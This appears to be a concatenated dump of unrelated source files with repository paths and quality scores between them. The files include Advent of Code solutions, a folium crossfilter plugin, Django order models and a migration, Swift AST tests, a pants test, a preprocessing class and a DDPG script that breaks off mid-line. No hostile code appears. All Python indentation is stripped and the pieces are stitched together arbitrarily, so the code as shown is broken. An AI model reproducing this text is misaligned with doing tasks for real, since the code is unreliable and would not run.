if len(s) % 2 == 1:
return s[len(s) / 2]
else:
return s[len(s) / 2 - 1 : len(s) / 2 + 1]
| 3.453125 | 3 |
day01.py | Jafnee/advent-of-code-2019 | 0 | 12786533 | def pt1(masses):
return sum(get_fuel(mass) for mass in masses)
def pt2(masses):
return sum(get_fuel_rec(mass) for mass in masses)
def get_fuel(mass: int):
return mass // 3 - 2
def get_fuel_rec(mass):
if (fuel := get_fuel(mass)) <= 0:
return 0
return fuel + get_fuel_rec(fuel)
def test_fuel_needed():
assert get_fuel(12) == 2
assert get_fuel(14) == 2
assert get_fuel(1969) == 654
assert get_fuel(100756) == 33583
def test_fuel_rec():
assert get_fuel_rec(1969) == 966
assert get_fuel_rec(100756) == 50346
if __name__ == '__main__':
masses = [int(mass) for mass in open('day01.txt', 'r')]
print(pt1(masses))
print(pt2(masses))
| 3.546875 | 4 |
folium/plugins/crossfilter.py | BibMartin/folium | 4 | 12786534 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Crossfilter
------
Crossfilter.
"""
from jinja2 import Template
import json
#from .utilities import color_brewer, _parse_size, legend_scaler, _locations_mirror, _locations_tolist, write_png,\
# image_to_url
#from .six import text_type, binary_type
from folium.element import Figure, JavascriptLink, CssLink, Div, MacroElement
from folium.map import FeatureGroup
from .heat_map import HeatMap
#from .map import Map, TileLayer, Icon, Marker, Popup
class Crossfilter(Div):
def __init__(self, data, **kwargs):
"""Create a Crossfilter
Returns
-------
Folium Crossfilter Object
"""
super(Crossfilter, self).__init__(**kwargs)
self._name = 'Crossfilter'
self.data = data
self.add_children(MacroElement("""
{% macro script(this, kwargs) %}
var {{this._parent.get_name()}} = {};
{{this._parent.get_name()}}.data = {{this._parent.data}};
{{this._parent.get_name()}}.crossfilter = crossfilter({{this._parent.get_name()}}.data);
{{this._parent.get_name()}}.allDim = {{this._parent.get_name()}}.crossfilter.dimension(
function(d) {return d;});
{% endmacro %}
"""))
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}">
{{this.html.render(**kwargs)}}
</div>
{% endmacro %}
{% macro script(this, kwargs) %}
dc.renderAll();
{% endmacro %}
""")
def render(self,**kwargs):
super(Crossfilter,self).render(**kwargs)
figure = self._parent.get_root()
assert isinstance(figure,Figure), ("You cannot render this Element "
"if it's not in a Figure.")
figure.header.add_children(
CssLink("https://cdnjs.cloudflare.com/ajax/libs/dc/1.7.5/dc.css"),
name='dcjs_css')
figure.header.add_children(
CssLink("https://cdnjs.cloudflare.com/ajax/libs/leaflet/0.7.3/leaflet.css"),
name='leaflet_css')
figure.header.add_children(
CssLink("https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css"),
name='bootstrap_css')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.6/d3.min.js"),
name='d3js')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/crossfilter/1.3.12/crossfilter.min.js"),
name='crossfilterjs')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/dc/2.0.0-beta.20/dc.js"),
name='dcjs')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/leaflet/0.7.3/leaflet.js"),
name='leaflet')
figure.header.add_children(
JavascriptLink("https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.8.3/underscore-min.js"),
name='underscorejs')
class PieFilter(Div):
def __init__(self, crossfilter, column, name="", width=150, height=150, inner_radius=20,
weight=None, order=None, colors=None, label=None, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(PieFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'PieFilter'
self.crossfilter = crossfilter
self.column = column
self.name = name
self.width = width
self.height = height
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.colors = [x for x in colors] if colors else None
self.label = label
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.pieChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.innerRadius({{this.inner_radius}})
{% if this.label %}.label({{this.label}}){% endif %}
{% if this.colors %}.ordinalColors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
class RowBarFilter(Div):
"""TODO docstring here
Parameters
----------
"""
def __init__(self, crossfilter, column, name="", width=150, height=150, inner_radius=20,
weight=None, order=None, elastic_x=True, colors=None, **kwargs):
super(RowBarFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'RowBarFilter'
self.crossfilter = crossfilter
self.column = column
self.name = name
self.width = width
self.height = height
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.elastic_x = elastic_x
self.colors = [x for x in colors] if colors else None
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.rowChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.elasticX({{this.elastic_x.__str__().lower()}})
{% if this.colors %}.ordinalColors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
class BarFilter(Div):
def __init__(self, crossfilter, column, width=150, height=150, bar_padding=0.1,
domain=None, groupby=None, xlabel="", ylabel="", margins=None,
weight=None, elastic_y=True, xticks=None, time_format=None, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(BarFilter, self).__init__(**kwargs)
self._name = 'BarFilter'
self.crossfilter = crossfilter
self.column = column
self.width=width
self.height=height
self.bar_padding=bar_padding
self.domain=json.dumps(domain)
self.groupby=groupby
self.xlabel=xlabel
self.ylabel=ylabel
self.margins=json.dumps(margins)
self.xticks=json.dumps(xticks)
self.time_format=time_format
self.weight = weight
self.elastic_y = elastic_y
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {
domain : {{this.domain}},
groupby : {{this.groupby}},
xAxisTickValues : {{this.xticks}},
};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {
return Math.floor(
(d["{{this.column}}"]-{{this.get_name()}}.domain[0])/{{this.get_name()}}.groupby)
+{{this.get_name()}}.domain[0]/{{this.get_name()}}.groupby;
});
{{this.get_name()}}.ticks = [];
for (var j=0; j<{{this.get_name()}}.xAxisTickValues.length; j++) {
{{this.get_name()}}.ticks[j] = {{this.get_name()}}.xAxisTickValues[j]/{{this.get_name()}}.groupby;
}
dc.barChart("#{{this.get_name()}}")
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.x(d3.scale.linear().domain([
{{this.get_name()}}.domain[0]/{{this.get_name()}}.groupby,
{{this.get_name()}}.domain[1]/{{this.get_name()}}.groupby,
]))
.elasticY({{this.elastic_y.__str__().lower()}})
.centerBar(false)
.barPadding({{this.bar_padding}})
.xAxisLabel("{{this.xlabel}}")
.yAxisLabel("{{this.ylabel}}")
.margins({{this.margins}})
.xAxis()
.tickValues({{this.get_name()}}.ticks)
.tickFormat(function(x){
{%if this.time_format %}
var dateformat = d3.time.format("{{this.time_format}}");
return dateformat(new Date(x*{{this.get_name()}}.groupby));
{% else %}
return x*{{this.get_name()}}.groupby;
{% endif %}
});
{% endmacro %}
""")
class FeatureGroupFilter(FeatureGroup):
def __init__(self, crossfilter, name=None, fit_bounds=False,
circle_radius=None, color="#0000ff", opacity=1., **kwargs):
"""
"""
super(FeatureGroupFilter, self).__init__(**kwargs)
self._name = 'FeatureGroupFilter'
self.tile_name = name if name is not None else self.get_name()
self.crossfilter = crossfilter
self.fit_bounds = fit_bounds
self.circle_radius = circle_radius
self.color = color
self.opacity = opacity
self._template = Template(u"""
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.feature_group = new L.FeatureGroup();
{{this.get_name()}}.updateFun = function() {
this.feature_group.clearLayers();
var dimVals = {{this.crossfilter.get_name()}}.allDim.top(Infinity)
for (var i in dimVals) {
var d = dimVals[i];
var marker =
{% if this.circle_radius %}L.circleMarker([d.lat, d.lng],
{
fillColor: '{{ this.color }}',
fillOpacity: {{ this.opacity }}
}).setRadius({{this.circle_radius}})
{% else %}L.marker([d.lat, d.lng],{opacity:{{this.opacity}} }){% endif %};
marker.bindPopup(d.popup);
this.feature_group.addLayer(marker);
}
{{this._parent.get_name()}}.addLayer(this.feature_group);
{% if this.fit_bounds %}{{this._parent.get_name()}}
.fitBounds(this.feature_group.getBounds());{% endif %}
}
dc.dataTable('#foo')
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js';})
.on('renderlet', function (table) { {{this.get_name()}}.updateFun();});
{{this.get_name()}}.updateFun();
{% endmacro %}
""")
class TableFilter(Div):
def __init__(self, crossfilter, columns, size=10, sort_by=None, ascending=True, **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(TableFilter, self).__init__(**kwargs)
self._name = 'TableFilter'
self.crossfilter = crossfilter
self.columns = columns
self.sort_by = sort_by
self.ascending = ascending
self.size = size
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<table id="{{this.get_name()}}" class="{{this.class_}}">
<thead>
<tr class="header">
{%for col in this.columns%}<th>{{col}}</th>{% endfor %}
</tr>
</thead>
</table>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dataTable = dc.dataTable('#{{this.get_name()}}');
{{this.get_name()}}.dataTable
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js extra line'; })
.size({{this.size}})
.columns([
{% for col in this.columns %}
function (d) { return d["{{col}}"]; },
{% endfor %}
])
{%if this.sort_by %}.sortBy(dc.pluck('{this.sort_by}'))
{%if this.ascending %}.order(d3.ascending){% else %}.order(d3.descending){% endif %}
{% endif %}
.on('renderlet', function (table) {
table.select('tr.dc-table-group').remove();
});
{% endmacro %}
""")
class CountFilter(Div):
def __init__(self, crossfilter, html_template="{filter}/{total}", **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(CountFilter, self).__init__(**kwargs)
self._name = 'CountFilter'
self.crossfilter = crossfilter
self.html_template = html_template
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">
{{this.html_template.format(
filter='<span class="filter-count"></span>',
total='<span class="total-count"></span>'
)}}
</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.dataCount = dc.dataCount("#{{this.get_name()}}")
.dimension({{this.crossfilter.get_name()}}.crossfilter)
.group({{this.crossfilter.get_name()}}.crossfilter.groupAll()
);
{% endmacro %}
""")
class ResetFilter(Div):
def __init__(self, html="Reset all", **kwargs):
"""TODO docstring here
Parameters
----------
"""
super(ResetFilter, self).__init__(**kwargs)
self._name = 'ResetFilter'
self.html = html
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<a id="{{this.get_name()}}" class="{{this.class_}} reset-filters">{{this.html}}</a>
{% endmacro %}
{% macro script(this, kwargs) %}
d3.selectAll('.reset-filters').on('click', function () {
dc.filterAll();
dc.renderAll();
});
{% endmacro %}
""")
class HeatmapFilter(HeatMap):
def __init__(self, crossfilter, name=None, fit_bounds=False, **kwargs):
"""
"""
super(HeatmapFilter, self).__init__([],**kwargs)
self._name = 'HeatmapFilter'
self.crossfilter = crossfilter
self.fit_bounds = fit_bounds
self._template = Template(u"""
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.heatmap = new L.heatLayer(
{},
{
minOpacity: {{this.min_opacity}},
maxZoom: {{this.max_zoom}},
max: {{this.max_val}},
radius: {{this.radius}},
blur: {{this.blur}},
gradient: {{this.gradient}}
})
.addTo({{this._parent.get_name()}});
{{this.get_name()}}.updateFun = function() {
// this.heatmap.clearLayers();
var dimVals = {{this.crossfilter.get_name()}}.allDim.top(Infinity);
var latlngs = [];
for (var i in dimVals) {
var d = dimVals[i];
latlngs.push([d.lat, d.lng]);
}
{{this.get_name()}}.heatmap.setLatLngs(latlngs);
{% if this.fit_bounds %}{{this._parent.get_name()}}
.fitBounds(this.heatmap.getBounds());{% endif %}
}
dc.dataTable('#foo')
.dimension({{this.crossfilter.get_name()}}.allDim)
.group(function (d) { return 'dc.js';})
.on('renderlet', function (table) { {{this.get_name()}}.updateFun();});
{{this.get_name()}}.updateFun();
{% endmacro %}
""")
class GeoChoroplethFilter(Div):
"""TODO docstring here
Parameters
----------
"""
def __init__(self, crossfilter, column, geojson, key_on='feature.properties.name',
name="", width=150, height=150, inner_radius=20,
weight=None, order=None, elastic_x=True, projection=None,
colors=None, **kwargs):
super(GeoChoroplethFilter, self).__init__(width=width, height=height, **kwargs)
self._name = 'GeoChoroplethFilter'
self.crossfilter = crossfilter
self.column = column
self.geojson = geojson
self.key_on = key_on
self.name = name
self.width = width
self.height = height
self.projection = projection
self.inner_radius = inner_radius
self.order = order
self.weight = weight
self.elastic_x = elastic_x
self.colors = colors if colors else None
self._template = Template(u"""
{% macro header(this, kwargs) %}
<style> #{{this.get_name()}} {
{% if this.position %}position : {{this.position}};{% endif %}
{% if this.width %}width : {{this.width[0]}}{{this.width[1]}};{% endif %}
{% if this.height %}height: {{this.height[0]}}{{this.height[1]}};{% endif %}
{% if this.left %}left: {{this.left[0]}}{{this.left[1]}};{% endif %}
{% if this.top %}top: {{this.top[0]}}{{this.top[1]}};{% endif %}
}
</style>
{% endmacro %}
{% macro html(this, kwargs) %}
<div id="{{this.get_name()}}" class="{{this.class_}}">{{this.html.render(**kwargs)}}</div>
{% endmacro %}
{% macro script(this, kwargs) %}
var {{this.get_name()}} = {};
{{this.get_name()}}.geojson = {{this.geojson}};
{{this.get_name()}}.dimension = {{this.crossfilter.get_name()}}.crossfilter.dimension(
function(d) {return d["{{this.column}}"];});
document.getElementById("{{this.get_name()}}").innerHTML =
'<h4>{{this.name}} <small><a id="{{this.get_name()}}-reset">reset</a></small></h4>'
+ '<div id="{{this.get_name()}}-chart" class="dc-chart"></div>';
{{this.get_name()}}.chart = dc.geoChoroplethChart('#{{this.get_name()}}-chart')
.width({{this.width}})
.height({{this.height}})
.dimension({{this.get_name()}}.dimension)
.group({{this.get_name()}}.dimension.group()
{% if this.weight %}.reduceSum(function(d) {return d["{{this.weight}}"];})
{% else %}.reduceCount(){% endif %}
)
.overlayGeoJson({{this.get_name()}}.geojson.features, "state",
function (feature) {return {{this.key_on}};}
)
{% if this.projection %}.projection({{this.projection}}){% endif %}
{% if this.colors %}.colors({{this.colors}}){% endif %}
{% if this.order %}.ordering(function (d) {
var out = null;
var order={{this.order}};
for (var j=0;j<order.length;j++) {
if (order[j]==d.key) {out = 1+j;}
}
return out;}){% endif %};
d3.selectAll('#{{this.get_name()}}-reset').on('click',function () {
{{this.get_name()}}.chart.filterAll();
dc.redrawAll();
});
{% endmacro %}
""")
| 2.03125 | 2 |
src/order/models.py | xistadi/BookStore | 0 | 12786535 | from django.db import models
from cart import models as cart_models
from django.db.models.signals import post_save
from django.dispatch import receiver
class Order(models.Model):
cart = models.OneToOneField(
cart_models.Cart,
related_name='order',
on_delete=models.PROTECT
)
delivery_status_choices = (('1', 'В процессе оформления'), ('2', 'На рассмотрении модерации'), ('3', 'Отменен'),
('4', 'Заказан'), ('5', 'Доставка'), ('6', 'Доставлен'))
delivery_status = models.CharField(
verbose_name='Статус заказа',
default=1,
max_length=20,
choices=delivery_status_choices
)
comment = models.TextField(
verbose_name='Комментарий',
blank=True,
null=True
)
type_of_payment = models.CharField(
verbose_name='Тип оплаты',
default=1,
max_length=20
)
date_add = models.DateTimeField(
auto_now=False,
auto_now_add=True,
verbose_name='Дата создания заказа'
)
date_last_change = models.DateTimeField(
auto_now=True,
auto_now_add=False,
verbose_name='Дата последнего изменения заказа'
)
def __str__(self):
return f'Заказ №{self.pk}, статус заказа: {self.get_delivery_status_display()}.'
class Meta:
verbose_name = 'Заказ'
verbose_name_plural = 'Заказы'
class AddressInOrder(models.Model):
order = models.ForeignKey(
Order,
on_delete=models.PROTECT,
related_name='address_in_order'
)
country = models.CharField(
'Страна',
max_length=20,
blank=True,
null=True
)
city = models.CharField(
'Город',
max_length=20,
blank=True,
null=True
)
index = models.CharField(
'Индекс',
max_length=15,
blank=True,
null=True
)
address1 = models.CharField(
'Адрес1',
max_length=50,
blank=True,
null=True
)
address2 = models.CharField(
'Адрес2',
max_length=50,
blank=True,
null=True
)
def __str__(self):
return f'Профиль адрес в заказе №{self.pk}.'
class Meta:
verbose_name = 'Профиль адрес в заказе'
verbose_name_plural = 'Профиль адреса в заказах'
| 2.046875 | 2 |
2020/day_22/one.py | zigapk/adventofcode | 0 | 12786536 | from collections import deque
q1 = deque()
q2 = deque()
player_2 = False
with open('in', 'r') as f:
f.readline()
for line in f.readlines():
try:
i = int(line.strip())
if player_2:
q2.append(i)
else:
q1.append(i)
except Exception:
player_2 = True
while len(q1) > 0 and len(q2) > 0:
card1 = q1.popleft()
card2 = q2.popleft()
if card1 > card2:
q1.append(max(card1, card2))
q1.append(min(card1, card2))
else:
q2.append(max(card1, card2))
q2.append(min(card1, card2))
q = q1 if len(q2) == 0 else q2
result = 0
for i in range(1, len(q) + 1):
result += i * q.pop()
print(result)
| 3.0625 | 3 |
tests/test_main/main_weather_data.py | zahraghh/Two-Stage-Stochastic-Programming | 3 | 12786537 | <gh_stars>1-10
import os
import sys
import pandas as pd
import csv
from Two_Stage_SP import download_windsolar_data, GTI,uncertainty_analysis
if __name__ == "__main__":
#Reading the data from the Weather Data Analysis section of the editable_values.csv
editable_data_path =os.path.join(sys.path[0], 'editable_values.csv')
editable_data = pd.read_csv(editable_data_path, header=None, index_col=0, squeeze=True).to_dict()[1]
city_DES =str(editable_data['city'])
#Downloading the weather data from NSRDB
download_windsolar_data.download_meta_data(city_DES)
#Calculating the global tilted irradiance on a surface in the City
GTI.GTI_results(city_DES)
#Calculating the distribution of global tilted irradiance (might take ~5 mins)
uncertainty_analysis.probability_distribution('GTI',46) #Name and the column number in the weather data
#Calculating the distribution of wind speed (might take ~5 mins)')
uncertainty_analysis.probability_distribution('wind_speed',8) #Name and the column number in the weather data
| 2.765625 | 3 |
tests/test_ast.py | keith/xcode-ast-dump | 80 | 12786538 | <gh_stars>10-100
import ast
import unittest
RAW_ARGUMENTS = open("tests/arguments.txt").read().strip().split()
class TestAST(unittest.TestCase):
def test_removes_emits(self):
_, other_arguments = ast.build_parser().parse_known_args(RAW_ARGUMENTS)
for argument in other_arguments:
self.assertNotIn("emit", argument)
def test_adds_dump(self):
command = ast.ast_command("", [])
self.assertIn("-dump-ast", command)
def test_starts_with_swiftc_argument(self):
command = ast.ast_command("swiftc_arg", [])
self.assertEqual(command[0], "swiftc_arg")
def test_ends_with_other_arguments(self):
command = ast.ast_command("", ["foobar"])
self.assertEqual(command[2], "foobar")
def test_swiftc_executable_path(self):
environment = {"DEVELOPER_DIR": "/foo", "TOOLCHAINS": "com.bar"}
swiftc = ast.swiftc_executable(environment)
self.assertEqual(swiftc,
"/foo/Toolchains/bar.xctoolchain/usr/bin/swiftc")
def test_swiftc_executable_path_override(self):
environment = {"DEVELOPER_DIR": "/foo", "TOOLCHAINS": "com.bar",
"AST_SWIFTC": "bar"}
swiftc = ast.swiftc_executable(environment)
self.assertEqual(swiftc, "bar")
def test_swift_executable_without_xcode(self):
swiftc = ast.swiftc_executable({"AST_SWIFTC": "baz"})
self.assertEqual(swiftc, "baz")
def test_swift_executable_no_environ(self):
swiftc = ast.swiftc_executable({})
self.assertEqual(swiftc, "swiftc")
def test_is_in_xcode(self):
self.assertTrue(ast.is_in_xcode({"TOOLCHAINS": "is_set"}))
def test_is_not_in_xcode(self):
self.assertFalse(ast.is_in_xcode({}))
| 2.75 | 3 |
django_test/articles/migrations/0004_auto_20200306_1921.py | MachineLearningIsEasy/python_lesson_22 | 1 | 12786539 | <gh_stars>1-10
# Generated by Django 3.0.3 on 2020-03-06 19:21
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0003_auto_20200306_1817'),
]
operations = [
migrations.AlterField(
model_name='article',
name='article_date',
field=models.DateTimeField(default=datetime.datetime(2020, 3, 6, 19, 21, 22, 43613)),
),
migrations.AlterField(
model_name='article',
name='article_name',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='article',
name='article_tag',
field=models.ManyToManyField(to='articles.Tag'),
),
migrations.AlterField(
model_name='article',
name='article_text',
field=models.CharField(blank=True, max_length=1000, null=True),
),
]
| 1.617188 | 2 |
tests/python/pants_test/rules/test_run.py | SergeKireev/pants | 0 | 12786540 | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.build_graph.address import Address, BuildFileAddress
from pants.engine.addressable import BuildFileAddresses
from pants.engine.fs import Digest, FileContent, InputFilesContent, Workspace
from pants.engine.interactive_runner import InteractiveRunner
from pants.rules.core import run
from pants.rules.core.binary import CreatedBinary
from pants.testutil.console_rule_test_base import ConsoleRuleTestBase
from pants.testutil.engine.util import MockConsole, run_rule
class RunTest(ConsoleRuleTestBase):
goal_cls = run.Run
def create_mock_binary(self, program_text: bytes) -> CreatedBinary:
input_files_content = InputFilesContent((
FileContent(path='program.py', content=program_text, is_executable=True),
))
digest, = self.scheduler.product_request(Digest, [input_files_content])
return CreatedBinary(
binary_name='program.py',
digest=digest,
)
def single_target_run(self, *, console: MockConsole, program_text: bytes, spec: str):
workspace = Workspace(self.scheduler)
interactive_runner = InteractiveRunner(self.scheduler)
address = Address.parse(spec)
bfa = BuildFileAddress(
build_file=None,
target_name=address.target_name,
rel_path=f'{address.spec_path}/BUILD'
)
build_file_addresses = BuildFileAddresses((bfa,))
res = run_rule(run.run, console, workspace, interactive_runner, build_file_addresses, {
(CreatedBinary, Address): lambda _: self.create_mock_binary(program_text)
})
return res
def test_normal_run(self) -> None:
console = MockConsole(use_colors=False)
program_text = b'#!/usr/bin/python\nprint("hello")'
res = self.single_target_run(
console=console,
program_text=program_text,
spec='some/addr'
)
self.assertEqual(res.exit_code, 0)
self.assertEquals(console.stdout.getvalue(), "Running target: some/addr:addr\nsome/addr:addr ran successfully.\n")
self.assertEquals(console.stderr.getvalue(), "")
def test_failed_run(self) -> None:
console = MockConsole(use_colors=False)
program_text = b'#!/usr/bin/python\nraise RuntimeError("foo")'
res = self.single_target_run(
console=console,
program_text=program_text,
spec='some/addr'
)
self.assertEqual(res.exit_code, 1)
self.assertEquals(console.stdout.getvalue(), "Running target: some/addr:addr\n")
self.assertEquals(console.stderr.getvalue(), "some/addr:addr failed with code 1!\n")
| 2.0625 | 2 |
supervised/preprocessing/preprocessing_exclude_missing.py | michaelneale/mljar-supervised | 1 | 12786541 | <gh_stars>1-10
import os
import json
import numpy as np
import pandas as pd
import logging
log = logging.getLogger(__name__)
class PreprocessingExcludeMissingValues(object):
@staticmethod
def remove_rows_without_target(data):
if "train" in data:
X_train = data.get("train").get("X")
y_train = data.get("train").get("y")
X_train, y_train = PreprocessingExcludeMissingValues.transform(
X_train, y_train
)
data["train"]["X"] = X_train
data["train"]["y"] = y_train
if "validation" in data:
X_validation = data.get("validation").get("X")
y_validation = data.get("validation").get("y")
X_validation, y_validation = PreprocessingExcludeMissingValues.transform(
X_validation, y_validation
)
data["validation"]["X"] = X_validation
data["validation"]["y"] = y_validation
return data
@staticmethod
def transform(X=None, y=None):
log.debug("Exclude rows with missing target values")
if y is None:
return X, y
y_missing = pd.isnull(y)
if np.sum(np.array(y_missing)) == 0:
return X, y
y = y.drop(y.index[y_missing])
y.index = range(y.shape[0])
if X is not None:
X = X.drop(X.index[y_missing])
X.index = range(X.shape[0])
return X, y
| 2.734375 | 3 |
app/stories/admin.py | Sherba/AdventureReader | 0 | 12786542 | <reponame>Sherba/AdventureReader<gh_stars>0
from django.contrib import admin
from .models import Genre, Node, Post
admin.site.register(Genre)
admin.site.register(Node)
admin.site.register(Post)
| 1.210938 | 1 |
main.py | samuelmat19/DDPG-tf2 | 11 | 12786543 | """
Main file
"""
import argparse
import logging
import random
import gym
from tqdm import trange
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from common_definitions import CHECKPOINTS_PATH, TOTAL_EPISODES, TF_LOG_DIR, UNBALANCE_P
from model import Brain
from utils import Tensorboard
if __name__ == "__main__":
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser(
prog="Deep Deterministic Policy Gradient (DDPG)",
description="Deep Deterministic Policy Gradient (DDPG) in Tensorflow 2"
)
parser.add_argument('--env', type=str, nargs='?',
